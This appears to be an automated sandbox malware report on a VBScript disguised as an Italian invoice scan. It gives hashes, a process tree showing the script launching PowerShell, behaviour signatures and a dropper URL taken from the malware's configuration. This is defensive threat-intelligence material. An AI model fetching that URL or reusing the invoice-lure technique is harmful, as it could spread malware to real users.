Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    18-10-2021 11:24

General

  • Target

    FATTURA_46082_ELEPHANTSCAVI-scan.vbs

  • Size

    4KB

  • MD5

    dfeab6c2910012eba15a7b4dc56b80f5

  • SHA1

    262560445a9f351cc2a1535fbf6857a9eb1eef0e

  • SHA256

    6db5f541f73470c314a570b21d90f78e91af21bbf5851660118566ffca9a1140

  • SHA512

    e2776b36a4cbad55ece79090352d03d097017b867dc4459d53ffdc2ca50ccff18223fc4248896875368eedf6cd372cfed83e32358a3a7b979730c4ffe0549a26

Score
10/10

Malware Config

  • Extracted
    Language
    ps1
    Source
    URLs
      exe.dropper
      https://hkuakdsjkjkhdskdskjkdskdsj.000webhostapp.com/bypass.txt

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FATTURA_46082_ELEPHANTSCAVI-scan.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1648

Network

MITRE ATT&CK Enterprise v6

Downloads

  • memory/1640-54-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

    Filesize

    8KB

  • memory/1648-55-0x0000000000000000-mapping.dmp

  • memory/1648-57-0x000007FEF2780000-0x000007FEF32DD000-memory.dmp

    Filesize

    11.4MB

  • memory/1648-58-0x0000000002850000-0x0000000002852000-memory.dmp

    Filesize

    8KB

  • memory/1648-59-0x0000000002852000-0x0000000002854000-memory.dmp

    Filesize

    8KB

  • memory/1648-60-0x0000000002854000-0x0000000002857000-memory.dmp

    Filesize

    12KB

  • memory/1648-61-0x000000000285B000-0x000000000287A000-memory.dmp

    Filesize

    124KB